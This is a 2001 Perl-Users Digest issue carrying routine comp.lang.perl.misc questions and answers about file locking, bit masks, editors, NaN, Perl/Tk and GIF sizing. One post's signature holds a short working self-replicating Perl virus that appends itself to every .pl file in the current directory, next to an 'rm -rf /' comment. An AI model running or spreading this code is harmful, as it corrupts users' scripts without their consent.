[18604] in Perl-Users-Digest
Perl-Users Digest, Issue: 772 Volume: 10
daemon@ATHENA.MIT.EDU (Perl-Users Digest)
Thu Apr 26 11:05:34 2001
Date: Thu, 26 Apr 2001 08:05:08 -0700 (PDT)
From: Perl-Users Digest <Perl-Users-Request@ruby.OCE.ORST.EDU>
To: Perl-Users@ruby.OCE.ORST.EDU (Perl-Users Digest)
Message-Id: <988297508-v10-i772@ruby.oce.orst.edu>
Content-Type: text
Perl-Users Digest Thu, 26 Apr 2001 Volume: 10 Number: 772
Today's topics:
Re: Appending to files and flock. <ubl@schaffhausen.de>
Re: binary operations <rayj00@yahoo.com>
Re: binary operations <bart.lateur@skynet.be>
Debugging Perl (jaime.suarez-murias@icn.siemens.com)
Re: Good editor for perl (Anno Siegel)
Re: Good editor for perl <doug@ursastudios.com>
Re: Good editor for perl <sthomas@ws5120.nc.fnc.fujitsu.com>
Re: Help Me Obi One You're my Only Hope (Tad McClellan)
Re: Help! How to down size perl interperator ? (Tad McClellan)
Re: how to open http://www.domain.com (Tad McClellan)
Re: match a range of number <david.bouman@nl.xo.com>
Re: oop bless problem <jasonh@colubs.com>
Re: operators: != vs. ne, strange behaviour <comdog@panix.com>
Re: operators: != vs. ne, strange behaviour (Rudolf Polzer)
Perl/TK for Win32 - WHERE TO GET? <ewald.koenig@ubs.com>
Re: Perl/TK for Win32 - WHERE TO GET? <simon.andrews@bbsrc.ac.uk>
Re: Perl/TK for Win32 - WHERE TO GET? <mk@ticklets.com>
Presenting -- 18th Testing Computer Software (TCS2001) (Peter Zuckerman)
re-sizing GIF images on the fly <graham@dragroup.com>
Re: re-sizing GIF images on the fly (Abigail)
Re: re-sizing GIF images on the fly <mk@ticklets.com>
Re: re-sizing GIF images on the fly <ubl@schaffhausen.de>
Re: Running Command Line Commands (Tad McClellan)
Re: Where is my script (Greg Bacon)
Digest Administrivia (Last modified: 6 Apr 01) (Perl-Users-Digest Admin)
----------------------------------------------------------------------
Date: Thu, 26 Apr 2001 16:02:41 +0100
From: Malte Ubl <ubl@schaffhausen.de>
Subject: Re: Appending to files and flock.
Message-Id: <3AE83890.7683EAF4@schaffhausen.de>
Milton Road schrieb:
>
> > > However, the author of this code doesn't lock the file at all. Surely
> > > as a CGI you might get many attempts to append to the file at the same
> > > time. My question is shouldn't flock be used here?
> >
> > Yes it should,
>
> Not necessarily. The author may have been trying to achieve cross-platform
> compatibility. Some platforms do not support the flock function.
Yes,
but the OP was suggesting that he could use flock, and he should.
->malte
------------------------------
Date: Thu, 26 Apr 2001 10:34:06 -0400
From: RayJ <rayj00@yahoo.com>
Subject: Re: binary operations
Message-Id: <3AE831DE.8020705@yahoo.com>
Ok, getting a little farther but still stuck on this:
my $infomask = hex '1f';
my $codemask = hex '60';
# at this point, @bits = 10000000
if ((@bits & $infomask) == 0x0) {do something because bottom 5 bits are
zero }
I am failing this test and not executing the then part.
Thanks,
Ray
------------------------------
Date: Thu, 26 Apr 2001 14:47:07 GMT
From: Bart Lateur <bart.lateur@skynet.be>
Subject: Re: binary operations
Message-Id: <kocgetg9bja24gfk6kt4i7djdnlitttadm@4ax.com>
RayJ wrote:
>my $infomask = hex '1f';
>my $codemask = hex '60';
>
># at this point, @bits = 10000000
>
>
>if ((@bits & $infomask) == 0x0) {do something because bottom 5 bits are
>zero }
>
>I am failing this test and not executing the then part.
@bits is no good. It should be a number with that as a binary
representation. Either pack/unpack (b/B) or oct("0b...") should be able
to do that. Er... is the lowest bit '1', or is it the highest bit?
Furthermore, if you don't have enough with 32 bits, which is commonly
the limit for integers, then note that you can extend the system by
using strings instead of numbers. That way is unlimited. Also, it's time
to discover vec(), which lets you use a string as an array.
$flags = ''; # no bits set yet
vec($flags, 5, 1) = 1; # set bit 5
vec($flags, 35, 1) = 1; # set bit 35
vec($flags, 5, 1) = 0; # clear bit 5
$flags2 = '';
vec($flags2, 35, 1) = 1; # set bit 35
vec($flags2, 10, 1) = 0; # set bit 10
$combi = $flags & $flags2; # both strings -> string
print vec($combi, 35, 1); # is bit 35 set? It should be.
-->
1
--
Bart.
------------------------------
Date: Thu, 26 Apr 2001 14:37:47 GMT
From: Jaime Suarez-Murias (jaime.suarez-murias@icn.siemens.com)
Subject: Debugging Perl
Message-Id: <%oWF6.6399$QV4.535643@www.newsranger.com>
Is there a book that discusses--with examples--the use of
Perl's debugger?
Is there a GUI debugger available?
Thank you in advance,
Jaime
------------------------------
Date: 26 Apr 2001 14:10:35 GMT
From: anno4000@lublin.zrz.tu-berlin.de (Anno Siegel)
Subject: Re: Good editor for perl
Message-Id: <9c9a8r$1t4$1@mamenchi.zrz.TU-Berlin.DE>
According to Philip Newton <nospam.newton@gmx.li>:
> On 25 Apr 2001 21:12:14 GMT, anno4000@lublin.zrz.tu-berlin.de (Anno
> Siegel) wrote:
>
> > Slightly more on topic, yet still going on about vim: what I miss
> > more than any syntax hilighter (which I don't trust enough) is
> > the ability to use the QuickFix feature[1].
> [snip]
> > Hmm "use Unix::QuickFix;" sounds snappy...
>
> Why "Unix"? Doesn't vim's QuickFix feature work on other platforms,
> too?
You are absolutely right, it does.
As usual when planning a module, its placement in the CPAN hierarchy
turns out to be th hardest problem. :)
Anno
------------------------------
Date: Thu, 26 Apr 2001 10:10:58 -0400
From: "Doug Daulton" <doug@ursastudios.com>
Subject: Re: Good editor for perl
Message-Id: <tegb85flu89v0b@corp.supernews.com>
I use Allaire Homesite 4.5 which has syntax color coding for Perl.
That said, I am a new Perl developer ( former Perl hack :^D ). So I
appreciate all of the info posted on this thread. I've downloaded Komodo
and will give it a shot.
Thanks,
Doug Daulton
"Super-Simon" <simon@super-simon.com> wrote in message
news:9c1csm$loh$1@news1.xs4all.nl...
> Hi all,
>
> I'm searching for a good, fast editor with syntax highlighting for perl
> (CGI) for use under Windows 2000 / Windows 98 (I use windowz only for
> editing scripts, scripts runs on Linux-server). It has to be free (I'm a
> poor student ;-)
>
> Grtz,
>
> Super-Simon
>
>
------------------------------
Date: 26 Apr 2001 10:52:38 -0400
From: Samuel Thomas <sthomas@ws5120.nc.fnc.fujitsu.com>
Subject: Re: Good editor for perl
Message-Id: <tl64rvbvhl5.fsf@ws5120.nc.fnc.fujitsu.com>
anno4000@lublin.zrz.tu-berlin.de (Anno Siegel) writes:
> I'm breaking a 10+ year-long habit of indenting by twos in favor
> of the mainstream fours, and I feel it's slowing me down a bit.
> Two blanks per indent was no problem, four is too much. Otherwise,
> the transition is easier than I expected.
Forgive me if I'm misinterpreting your problem, but in both vim and
emacs you can set up your editor to auto-indent with spaces rather
than tabs. Is this what you are looking for? I don'tremember how
to do it but I think the article was somewhere at www.jwz.org
--
/\
Sam Thomas / \
Ext 1161 / ** \
/______\
------------------------------
Date: Thu, 26 Apr 2001 10:00:49 -0400
From: tadmc@augustmail.com (Tad McClellan)
Subject: Re: Help Me Obi One You're my Only Hope
Message-Id: <slrn9egagh.1c3.tadmc@tadmc26.august.net>
Tuan Ngo <tuan.ngo1@home.com> wrote:
> Subject: Help Me Obi One You're my Only Hope
Please put the subject of your article in the Subject of your article.
--
Tad McClellan SGML consulting
tadmc@augustmail.com Perl programming
Fort Worth, Texas
------------------------------
Date: Thu, 26 Apr 2001 09:42:01 -0400
From: tadmc@augustmail.com (Tad McClellan)
Subject: Re: Help! How to down size perl interperator ?
Message-Id: <slrn9eg9d9.1c3.tadmc@tadmc26.august.net>
Pally Kuo <pally@axtronics.com.tw> wrote:
>How can I get "Microperl"?
http://www.google.com/
type "microperl" (without the quotes) in the little box, click
on "Google Search".
:-)
--
Tad McClellan SGML consulting
tadmc@augustmail.com Perl programming
Fort Worth, Texas
------------------------------
Date: Thu, 26 Apr 2001 10:04:19 -0400
From: tadmc@augustmail.com (Tad McClellan)
Subject: Re: how to open http://www.domain.com
Message-Id: <slrn9egan3.1c3.tadmc@tadmc26.august.net>
JWP <question_1@hetnet.nl> wrote:
>
>How can i open a file from the internet .
I don't know what "file from the internet" means...
>Something like
>
>open http://www.domain.com/file.html
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
That is not a file. That looks like a URL or something.
>Mij server dosn't have a LWP modul installed
It appears that you already know what you need.
What problem is it that you need help solving?
Have you seen the Perl FAQ, part 8?
"How do I keep my own module/library directory?"
--
Tad McClellan SGML consulting
tadmc@augustmail.com Perl programming
Fort Worth, Texas
------------------------------
Date: Thu, 26 Apr 2001 15:21:06 +0200
From: David Bouman <david.bouman@nl.xo.com>
Subject: Re: match a range of number
Message-Id: <3AE820C2.D0A6BA@nl.xo.com>
Abigail wrote:
>
> David Bouman (david.bouman@nl.xo.com) wrote on MMDCCXCV September
> MCMXCIII in <URL:news:3AE7DA90.6DE3C6A2@nl.xo.com>:
> ?? Abigail wrote:
> ??
> ?? > sub strictly_sorted {
> ?? > strictly_sorted (scalar (@_), 2) ||
> ?? > $_ [0] < $_ [1] && strictly_sorted @_ [1 .. $#_];
> ?? > }
> ??
> ?? Ehm.., doesn't this spell "infinite recursion" ?
>
> We were talking how a mathematician would do it. Certainly smart math
> people won't limit themselves to evaluate an expression in just one way!
> They'll pick the right path.
Still, not being a math-person myself, I'll leave you with my $0.02:
sub strictly_sorted {
shift() < $_[0] && ( @_==1 || &strictly_sorted );
}
--
David.
------------------------------
Date: Thu, 26 Apr 2001 08:02:29 -0700
From: "Jason Hurst" <jasonh@colubs.com>
Subject: Re: oop bless problem
Message-Id: <3ae83882$0$164@wodc7nh6.news.uu.net>
Have you taken a look at the script I'm doing? (which was previously given
a link to in my first posting:
http://www.colubs.com/saveStateDB.pm)
Maybe when your just using a method you don't have to bless the object, but
I'm overriding the CGI new method, then adding a few extra fields, I'm also
using various new methods as well as autoload..
Also, is it no true then when you DON'T bless the object properly your new
class won't be able to be extended upon? So if i don't bless it, it would
be bad oop practice, would it not?
In any case, when i don't bless my object, it can't find my new methods
so... it doesn't work.
"Anno Siegel" <anno4000@lublin.zrz.tu-berlin.de> wrote in message
news:9c7nrt$p8p$1@mamenchi.zrz.TU-Berlin.DE...
> According to Jason Hurst <jasonh@colubs.com>:
> > no, sorry, I'm trying to extend cgi.pm. i.e, I'm using it as my super
> > class.
>
> Please don't top-post. The words you are referring to are a mile down,
> or would be if I had left them in.
>
> [jeopardectomy]
>
> Inheritance as an extension method is overrated. (At least in
> Perl OO, of which some may say it doesn't exist. Ahem.) But if
> all you want to do is add a few methods it may be fine.
>
> If you hadn't made a mess of the thread, I would have preferred to
> point out your errors one by one (there aren't that many). This
> way, I'll just throw a demo script at you that demonstrates how
> to inherit from CGI. It still doesn't bless anything explicitly.
>
> Anno
>
> #!/usr/bin/perl
> use warnings; use strict; $| = 1;
>
> use CGI;
>
> # build class CGI_Ext:
> @CGI_Ext::ISA = qw( CGI);
>
> sub CGI_Ext::othermethod {
> print "here\n";
> }
>
> # use it (still) in package main:
> my $obj = CGI_Ext->new;
> print $obj->header; # call a CGI method
> $obj->othermethod; # call a CGI_Ext method
------------------------------
Date: Thu, 26 Apr 2001 10:00:42 -0400
From: brian d foy <comdog@panix.com>
Subject: Re: operators: != vs. ne, strange behaviour
Message-Id: <comdog-B510F4.10004226042001@news.panix.com>
In article <9c8dm3$bln$02$1@news.t-online.com>, "Einhardschule
Seligenstadt" <webmaster@einhardschule.de> wrote:
> Martien Verbruggen <mgjv@tradingpost.com.au> schrieb in im Newsbeitrag:
> slrn9ef4jc.bf0.mgjv@verbruggen.comdyn.com.au...
> > On Wed, 25 Apr 2001 21:49:29 -0400,
> > brian d foy <comdog@panix.com> wrote:
> > > In article <slrn9eduka.2de.eins@www42.t-offline.de>, eins@durchnull.de
> > > wrote:
> > >> AND I FOUND A WAY TO GENERATE NAN WITHOUT USING STRINGS:
> > >> print (-1) ** 0.5;
> > >> TO PROVE NAN IS NOT SUPPORTED BY ACCIDENT.
> > > i get completely different behaviour on the *BSD flavours, as
> > > i noted earlier.
> > I suggested in an article upthread that NaN in Perl is probably only
> > supported [1] on systems that have isnan(3)
> I meant: Perl supports NaN and Inf IF AND ONLY IF compiled in. And to the
> man page references: just grep for NAN!
i did. that's why i was curious which references you were using to
support your claim. Perl only supports it if the underlying libc has
it apparently. that is - don't count on it being there because it is
not portable. that is - it is not a Perl feature.
> It is said you cannot check using a simple re for a numeric format because
> IEEE special numbers like NAN do not match it.
yes. however, that does not mean it is a Perl feature. it only
means that you cannot use a regex that checks only numeric digits
because the IEEE has special representations. it does not say that
Perl generates those special values or understands those special
values.
> What does
>
> (-1) ** 0.5
>
> do on your computer?
perhaps you should see earlier posts, and also identify the operating
system and version of Perl that you use if you post again. it would
be even better for you to try your claims on a variety of platforms.
--
brian d foy <comdog@panix.com>
------------------------------
Date: Thu, 26 Apr 2001 16:53:41 +0200
From: eins@durchnull.de (Rudolf Polzer)
Subject: Re: operators: != vs. ne, strange behaviour
Message-Id: <slrn9egdjl.65v.eins@www42.t-offline.de>
brian d foy <comdog@panix.com> wrote:
> In article <slrn9eduka.2de.eins@www42.t-offline.de>, eins@durchnull.de
> wrote:
>
>
> > AND I FOUND A WAY TO GENERATE NAN WITHOUT USING STRINGS:
> >
> > print (-1) ** 0.5;
> >
> > TO PROVE NAN IS NOT SUPPORTED BY ACCIDENT.
>
> i get completely different behaviour on the *BSD flavours, as
> i noted earlier. i don't see the references in the perl docs
> that lead you to beleive that NaN is a perl feature. it
> is certainly discussed, but only in terms of the IEEE
> representation - not a declaration of support by perl. indeed,
> i have already shown versions of perl that don't.
I meant, the sentences about this show that on some perl versions NaN
_is_ a valid float and not an error that perl should normally catch.
--
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
####################### http://learn.to/quote #######################
------------------------------
Date: Thu, 26 Apr 2001 14:50:32 +0200
From: Ewald =?iso-8859-1?Q?K=C3=B6nig?= <ewald.koenig@ubs.com>
Subject: Perl/TK for Win32 - WHERE TO GET?
Message-Id: <3AE81998.831911E3@ubs.com>
I am using activestate perl for win32.
Where do I get TK extension?
------------------------------
Date: Thu, 26 Apr 2001 14:44:00 +0100
From: Simon Andrews <simon.andrews@bbsrc.ac.uk>
Subject: Re: Perl/TK for Win32 - WHERE TO GET?
Message-Id: <3AE82620.68CE8718@bbsrc.ac.uk>
Ewald König wrote:
>
> I am using activestate perl for win32.
> Where do I get TK extension?
Use ppm.
C:>ppm
ppm>install Tk
ppm>exit
C:>
(May need an extra step if you are behind a firewall - see
http://www.activestate.com/ASPN/Downloads/ActivePerl/PPM/ for details).
------------------------------
Date: Thu, 26 Apr 2001 16:03:12 +0200
From: "Paul Kersey" <mk@ticklets.com>
Subject: Re: Perl/TK for Win32 - WHERE TO GET?
Message-Id: <9c99v1$mii$1@news1.xs4all.nl>
> I am using activestate perl for win32.
> Where do I get TK extension?
Try typing
ppm<enter>
install TK<enter> from the dos-prompt.
This should do exactly what you want.
type
ppm<enter>
search TK<enter> to see which tk extensions are available for activeperl.
------------------------------
Date: Thu, 26 Apr 2001 09:29:39 -0500
From: pazpax@clark.net (Peter Zuckerman)
Subject: Presenting -- 18th Testing Computer Software (TCS2001) Conference
Message-Id: <pazpax-2604010929390001@sdn-ar-002dcwashp183.dialsprint.net>
The continuing annual Conference on Testing Computer Software again
assembled a formidable group of experts on every phase of testing. The
latest developments and discoveries of software testing technologies will
be presented and explored, to meet the software development challenges of
the coming years.
18th International Conference and Exposition on
TESTING COMPUTER SOFTWARE
Theme: Meeting the New Challenges of Testing
June 18-22, 2001
Washington, D.C. * Hyatt Regency (Bethesda) * USA
(Conference: June 20-22; Workshops/Tutorials: June 18-19)
In cooperation with:
Association for Computing Machinery (ACM) SIGSoft
American Society for Quality (ASQ) Software Division
IEEE Reliability Society
Software Technology Support Center (STSC)
The complete TCS2001 program can be explored on the Conference web site:
<http://www.uspdi.org/conference>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
CONFERENCE FEATURES
* Pre-Conference (June 18-19) Workshops (2 days) and Tutorials (1 day)
will present comprehensive technical sessions for software testing
practitioners.
Detailed descriptions of the Workshops/Tutorials can be checked out:
<http://www.uspdi.org/conference/workshops.html>
* Six General Sessions present Keynote Speakers.
* Thirty-two Concurrent Sessions divided into four parallel tracks present
a wide variety of topics and issues in major areas of: Management,
Automation, Technology, Requirements, Practices, Web and Case Studies.
For detailed descriptions of the Technical Program, including Keynote
speakers see:
<http://www.uspdi.org/conference/program.html>
* Vendor Exhibit of software testing tools and services.
* The Conference Volume (including the presentations and proceedings
of the sessions) will be a valuable reference for testing projects.
* Networking:
- Birds-of-a-Feather Sessions allow you to meet and network with the
speakers and other conference attendees, and discuss areas of mutual
interest.
- Lunch Discussion Groups will facilitate the exploration of common
interest topics among the participants.
* * * * *
For complete program details and registration please contact the U.S.
Professional Development Institute (USPDI):
Regular Mail: USPDI, 612 Ethan Allen Avenue, Suite 100; Takoma Park,
MD 20912-5400, USA.
Phone: (+1) 301-270-1033
Fax: (+1) 301-270-1040
E-mail: admin@uspdi.org (Subject: TCS2001)
On-line:
Brochure request: <http://www.uspdi.org/conference/brochure.html>
Registration: <http://www.uspdi.org/conference/register.html>
Web download: <http://www.uspdi.org/conference/printbrochure.html>
* * * * *
------------------------------
Date: Thu, 26 Apr 2001 13:58:42 +0100
From: Andrew Boswell <graham@dragroup.com>
Subject: re-sizing GIF images on the fly
Message-Id: <4jnMGwACuB66EAkB@dragroup.com>
I want to write a Perl script that examines a GIF file to determine the
image size (width and height in pixels), then creates a thumbnail of it
on the fly. Writing the script poses few problems, but how do you
determine the size of a GIF image? I have downloaded the CompuServe
GIF89a Spec but that doesn't seem to help much. I know that binary files
are not meant to be read by humans, only computers, so how and with what
do I read a (binary) GIF file on the fly, and extract the information I
want?
--
Graham Stow
DENIS ROONEY ASSOCIATES
graham@dragroup.com
http://www.dragroup.com
------------------------------
Date: Thu, 26 Apr 2001 13:28:52 +0000 (UTC)
From: abigail@foad.org (Abigail)
Subject: Re: re-sizing GIF images on the fly
Message-Id: <slrn9eg8kk.tij.abigail@tsathoggua.rlyeh.net>
Andrew Boswell (graham@dragroup.com) wrote on MMDCCXCV September MCMXCIII
in <URL:news:4jnMGwACuB66EAkB@dragroup.com>:
<> I want to write a Perl script that examines a GIF file to determine the
<> image size (width and height in pixels), then creates a thumbnail of it
<> on the fly. Writing the script poses few problems, but how do you
<> determine the size of a GIF image?
Just count the pixels. But do it twice, since you post twice as well.
Abigail
------------------------------
Date: Thu, 26 Apr 2001 15:51:48 +0200
From: "Paul Kersey" <mk@ticklets.com>
Subject: Re: re-sizing GIF images on the fly
Message-Id: <9c999k$l32$1@news1.xs4all.nl>
> I want to write a Perl script that examines a GIF file to determine the
> image size (width and height in pixels), then creates a thumbnail of it
> on the fly. Writing the script poses few problems, but how do you
> determine the size of a GIF image?
Try using the Image::Size module...
------------------------------
Date: Thu, 26 Apr 2001 16:05:43 +0100
From: Malte Ubl <ubl@schaffhausen.de>
Subject: Re: re-sizing GIF images on the fly
Message-Id: <3AE83947.FDBECD77@schaffhausen.de>
Andrew Boswell schrieb:
>
> I want to write a Perl script that examines a GIF file to determine the
> image size (width and height in pixels), then creates a thumbnail of it
> on the fly. Writing the script poses few problems, but how do you
> determine the size of a GIF image? I have downloaded the CompuServe
> GIF89a Spec but that doesn't seem to help much. I know that binary files
> are not meant to be read by humans, only computers, so how and with what
> do I read a (binary) GIF file on the fly, and extract the information I
> want?
Everytime something looks too difficult to do, or rather it looks like its
gonna take a long time to do, and it could be generalized and in 1000 other
situations look at CPAN.org whether its been done before.
Nobody here is going to help you doing something which has been done
before and put in a module.
Bye,
->malte
------------------------------
Date: Thu, 26 Apr 2001 09:46:45 -0400
From: tadmc@augustmail.com (Tad McClellan)
Subject: Re: Running Command Line Commands
Message-Id: <slrn9eg9m5.1c3.tadmc@tadmc26.august.net>
bowman <bowman@montana.com> wrote:
>At one
>time there was a project to replicate the *nix tools in Perl, but I haven't
>followed the progress on that.
Perl Power Tools:
http://language.perl.com/ppt/
--
Tad McClellan SGML consulting
tadmc@augustmail.com Perl programming
Fort Worth, Texas
------------------------------
Date: Thu, 26 Apr 2001 14:14:39 -0000
From: gbacon@HiWAAY.net (Greg Bacon)
Subject: Re: Where is my script
Message-Id: <tegbafa7lftj36@corp.supernews.com>
In article <slrn9eeauf.22e.eins@www42.t-offline.de>,
Rudolf Polzer <eins@durchnull.de> wrote:
: [...]
: BTW: is it possible to get the filename from a handle? [...]
Yes, if you install Plan9:
<URL:http://plan9.bell-labs.com/sys/doc/lexnames.html>
Greg
--
Kelso: Chicks must really dig astronauts. It says here they get all
the Tang they want!
------------------------------
Date: 6 Apr 2001 21:33:47 GMT (Last modified)
From: Perl-Users-Request@ruby.oce.orst.edu (Perl-Users-Digest Admin)
Subject: Digest Administrivia (Last modified: 6 Apr 01)
Message-Id: <null>
Administrivia:
The Perl-Users Digest is a retransmission of the USENET newsgroup
comp.lang.perl.misc. For subscription or unsubscription requests, send
the single line:
subscribe perl-users
or:
unsubscribe perl-users
to almanac@ruby.oce.orst.edu.
To submit articles to comp.lang.perl.announce, send your article to
clpa@perl.com.
To request back copies (available for a week or so), send your request
to almanac@ruby.oce.orst.edu with the command "send perl-users x.y",
where x is the volume number and y is the issue number.
For other requests pertaining to the digest, send mail to
perl-users-request@ruby.oce.orst.edu. Do not waste your time or mine
sending perl questions to the -request address, I don't have time to
answer them even if I did know the answer.
------------------------------
End of Perl-Users Digest V10 Issue 772
**************************************